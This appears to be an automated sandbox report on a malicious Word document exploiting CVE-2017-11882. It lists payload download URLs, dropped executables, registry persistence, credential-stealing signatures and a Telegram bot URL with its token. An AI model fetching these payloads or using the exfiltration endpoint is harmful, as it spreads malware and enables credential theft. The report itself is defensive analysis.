   54 192.168.2.255, 137, 138 unknown unknown 32->54 signatures14 process15 dnsIp16 58 api.ipify.org 104.26.13.205, 443, 49173 CLOUDFLARENETUS United States 35->58 44 C:\Users\user\AppData\Roaming\...\mpTrle.exe, PE32 35->44 dropped 90 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 35->90 92 Tries to steal Mail credentials (via file / registry access) 35->92 94 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->94 file17 signatures18

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      REQUEST FOR QUOTATION.docx.doc9%VirustotalBrowse
                      REQUEST FOR QUOTATION.docx.doc5%ReversingLabs
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp100%AviraEXP/CVE-2017-11882.Gen
                      C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe100%AviraHEUR/AGEN.1305639
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc100%AviraHEUR/Rtf.Malformed
                      C:\Users\user\AppData\Roaming\html.exe100%AviraHEUR/AGEN.1305639
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe100%AviraHEUR/AGEN.1305639
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc100%AviraHEUR/Rtf.Malformed
                      C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\html.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe37%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\html.exe37%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe37%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      wbze.de11%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://api.ipif80%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://104.168.33.34/5457/html.exeiiC:0%Avira URL Cloudsafe
                      http://104.168.33.34/5457/html.exe0%Avira URL Cloudsafe
                      http://tempuri.org/DataSet1.xsd)Microsoft0%Avira URL Cloudsafe
                      http://104.168.33.34/xampp/rzz/rz/0%Avira URL Cloudsafe
                      http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc0%Avira URL Cloudsafe
                      http://104.168.33.34/5457/html.exej0%Avira URL Cloudsafe
                      http://wbze.de/u7xc0%Avira URL Cloudsafe
                      https://wbze.de/u7xc0%Avira URL Cloudsafe
                      http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc1%VirustotalBrowse
                      http://tempuri.org/DataSet1.xsd)Microsoft1%VirustotalBrowse
                      https://wbze.de/u7xc10%VirustotalBrowse
                      http://wbze.de/u7xc10%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      104.26.13.205
                      truefalse
                        high
                        wbze.de
                        109.71.253.25
                        truetrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          http://104.168.33.34/5457/html.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          http://104.168.33.34/xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doctrue
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://wbze.de/u7xctrue
                          • 10%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://wbze.de/u7xcfalse
                          • 10%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/T0mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://account.dyn.com/html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              high
                              http://crl.entrust.net/server1.crl0html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.entrust.net03html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.ipif8html.exe, 0000000A.00000002.656186717.0000000002932000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://104.168.33.34/5457/html.exeiiC:EQNEDT32.EXE, 00000008.00000002.381980633.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.diginotar.nl/cps/pkioverheid0html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.ipify.org/phtml.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.ipify.org/thtml.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/DataSet1.xsd)MicrosoftmpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.drfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://api.ipify.orghtml.exe, 0000000A.00000002.656186717.000000000293B000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.000000000249C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.ipify.orghtml.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.ipify.org/TXhtml.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://104.168.33.34/xampp/rzz/rz/rz on 104.168.33.34.url.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://api.ipify.org/TbmpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://104.168.33.34/5457/html.exejEQNEDT32.EXE, 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://ocsp.entrust.net0Dhtml.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehtml.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://secure.comodo.com/CPS0html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.entrust.net/2048ca.crl0html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    109.71.253.25
                                                    wbze.deGermany
                                                    207770ATLANTIACLOUDNLtrue
                                                    104.26.13.205
                                                    api.ipify.orgUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.168.33.34
                                                    unknownUnited States
                                                    36352AS-COLOCROSSINGUStrue
                                                    172.67.74.152
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    IP
                                                    192.168.2.255
                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1436756
                                                    Start date and time:2024-05-06 14:58:16 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 25s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:17
                                                    Number of new started drivers analysed:1
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:REQUEST FOR QUOTATION.docx.doc
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.expl.evad.winDOC@27/33@11/5
                                                    EGA Information:
                                                    • Successful, ratio: 71.4%
                                                    HCA Information:
                                                    • Successful, ratio: 93%
                                                    • Number of executed functions: 264
                                                    • Number of non-executed functions: 13
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Scroll down
                                                    • Close Viewer
                                                    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.205.165.13, 23.205.165.20, 96.17.61.58
                                                    • Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, a122.dscd.akamai.net, acroipm2.adobe.com
                                                    • Execution Graph export aborted for target mpTrle.exe, PID 3532 because it is empty
                                                    • Execution Graph export aborted for target mpTrle.exe, PID 4088 because it is empty
                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    TimeTypeDescription
                                                    05:59:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mpTrle C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
                                                    05:59:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mpTrle C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe
                                                    14:59:17API Interceptor86x Sleep call for process: EQNEDT32.EXE modified
                                                    14:59:21API Interceptor11501x Sleep call for process: html.exe modified
                                                    14:59:36API Interceptor11591x Sleep call for process: mpTrle.exe modified
                                                    14:59:41API Interceptor912x Sleep call for process: AcroRd32.exe modified
                                                    14:59:46API Interceptor2454x Sleep call for process: RdrCEF.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    104.26.13.205ReturnLegend.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                    • api.ipify.org/
                                                    Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=json
                                                    E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/
                                                    SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                    • api.ipify.org/
                                                    172.67.74.152Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=json
                                                    Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=json
                                                    Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                    • api.ipify.org/?format=json
                                                    SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=json
                                                    SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=json
                                                    Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                    • api.ipify.org/?format=json
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    api.ipify.orglnvoice.jsGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOOD.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    lnvoice-1205700442.pdf (4).jsGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    https://reactivate-account.live/Get hashmaliciousUnknownBrowse
                                                    • 172.67.74.152
                                                    app.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.74.152
                                                    INVOICE KAD-0138-2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    Supplier Order Scan 0001293039493.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                    • 104.26.13.205
                                                    file.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    DHL_VTER000105453.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    DHL_VTER000105450.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSOrder4500318042.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 104.21.89.249
                                                    #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                    • 104.21.89.249
                                                    #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                    • 104.21.89.249
                                                    FW_ New PO Acknowledgement From The Vankam Freightways.emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.24.14
                                                    https://www.autohotkey.com/download/ahk-v2.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.89.135
                                                    https://vps91589.inmotionhosting.com/dh/dhGet hashmaliciousUnknownBrowse
                                                    • 104.18.11.207
                                                    https://classic.dreamclass.io/pages/admissions/form/BvtxckGet hashmaliciousUnknownBrowse
                                                    • 104.17.24.14
                                                    lnvoice.jsGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    https://doc-54.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    3eK5m977AY.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                    • 104.20.4.235
                                                    AS-COLOCROSSINGUSOrder4500318042.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 192.3.179.142
                                                    AnYEs5xxvX.exeGet hashmaliciousUnknownBrowse
                                                    • 192.227.146.252
                                                    https://waqkqfwpfkjvqepi.com/XapzGet hashmaliciousUnknownBrowse
                                                    • 107.173.189.240
                                                    IQU2qqn8AZ.elfGet hashmaliciousMiraiBrowse
                                                    • 104.170.167.245
                                                    0KRPn.vbsGet hashmaliciousAgentTeslaBrowse
                                                    • 172.245.123.18
                                                    202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                    • 23.94.53.100
                                                    Confirm!!.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 192.227.130.26
                                                    PIO88938MB.docx.docGet hashmaliciousUnknownBrowse
                                                    • 107.172.31.6
                                                    QUOTATION#30810.exeGet hashmaliciousRemcosBrowse
                                                    • 172.245.208.13
                                                    youhaveonefilefortody.vbsGet hashmaliciousAgentTeslaBrowse
                                                    • 172.245.123.18
                                                    ATLANTIACLOUDNLhttps://cranky-almeida.109-71-253-24.plesk.page/app/Get hashmaliciousUnknownBrowse
                                                    • 109.71.253.24
                                                    java.exeGet hashmaliciousUnknownBrowse
                                                    • 109.71.252.45
                                                    Dhl Waybill Document.docGet hashmaliciousFormBookBrowse
                                                    • 109.71.253.24
                                                    CLOUDFLARENETUSOrder4500318042.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 104.21.89.249
                                                    #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                    • 104.21.89.249
                                                    #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                    • 104.21.89.249
                                                    FW_ New PO Acknowledgement From The Vankam Freightways.emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.24.14
                                                    https://www.autohotkey.com/download/ahk-v2.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.89.135
                                                    https://vps91589.inmotionhosting.com/dh/dhGet hashmaliciousUnknownBrowse
                                                    • 104.18.11.207
                                                    https://classic.dreamclass.io/pages/admissions/form/BvtxckGet hashmaliciousUnknownBrowse
                                                    • 104.17.24.14
                                                    lnvoice.jsGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    https://doc-54.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    3eK5m977AY.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                    • 104.20.4.235
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    05af1f5ca1b87cc9cc9b25185115607dOrder4500318042.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 109.71.253.25
                                                    #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                    • 109.71.253.25
                                                    Orden de compra 0001-00255454.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 109.71.253.25
                                                    getinher.docGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    citat-05022024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                    • 109.71.253.25
                                                    nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                    • 109.71.253.25
                                                    QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    7dcce5b76c8b17472d024758970a406bOrder4500318042.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 109.71.253.25
                                                    #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                    • 109.71.253.25
                                                    Orden de compra 0001-00255454.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 109.71.253.25
                                                    scanned fax.docxGet hashmaliciousUnknownBrowse
                                                    • 109.71.253.25
                                                    getinher.docGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    citat-05022024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    PAYROLL.docGet hashmaliciousFormBookBrowse
                                                    • 109.71.253.25
                                                    Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                    • 109.71.253.25
                                                    rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 109.71.253.25
                                                    36f7277af969a6947a61ae0b815907a1lnvoice.jsGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    PO 2_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    SC-246214.docGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    OWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    NI-45733-D.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    Payment Swift.docGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    gmb.xlsGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    • 172.67.74.152
                                                    No context
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:modified
                                                    Size (bytes):292
                                                    Entropy (8bit):5.20899175446721
                                                    Encrypted:false
                                                    SSDEEP:6:DiSkVOq2PP2nKuAl9OmbnIFUt86i5Zmw+6iTkwOP2nKuAl9OmbjLJ:DiHOvWHAahFUt86i5/+6iT57HAaSJ
                                                    MD5:62311E39410AC0DF0EDA87197F494FDF
                                                    SHA1:286E52E2D731030DE742FE801AAF5767C2A16EA2
                                                    SHA-256:B627F3656787CC9467F29E540656B24469E03CCC78073B63E5DFF116911FF822
                                                    SHA-512:806E32CDB5F43AD58906C9A85610EB1A422A74A0E87D9AB505B6E678EEC8A90EE2B5C3163F59641702E8118EBB6555C40650204DD01DAFC5E50511240C055442
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/05/06-14:59:48.602 3900 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/06-14:59:48.604 3900 Recovering log #3.2024/05/06-14:59:48.604 3900 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.20899175446721
                                                    Encrypted:false
                                                    SSDEEP:6:DiSkVOq2PP2nKuAl9OmbnIFUt86i5Zmw+6iTkwOP2nKuAl9OmbjLJ:DiHOvWHAahFUt86i5/+6iT57HAaSJ
                                                    MD5:62311E39410AC0DF0EDA87197F494FDF
                                                    SHA1:286E52E2D731030DE742FE801AAF5767C2A16EA2
                                                    SHA-256:B627F3656787CC9467F29E540656B24469E03CCC78073B63E5DFF116911FF822
                                                    SHA-512:806E32CDB5F43AD58906C9A85610EB1A422A74A0E87D9AB505B6E678EEC8A90EE2B5C3163F59641702E8118EBB6555C40650204DD01DAFC5E50511240C055442
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/05/06-14:59:48.602 3900 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/06-14:59:48.604 3900 Recovering log #3.2024/05/06-14:59:48.604 3900 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.20899175446721
                                                    Encrypted:false
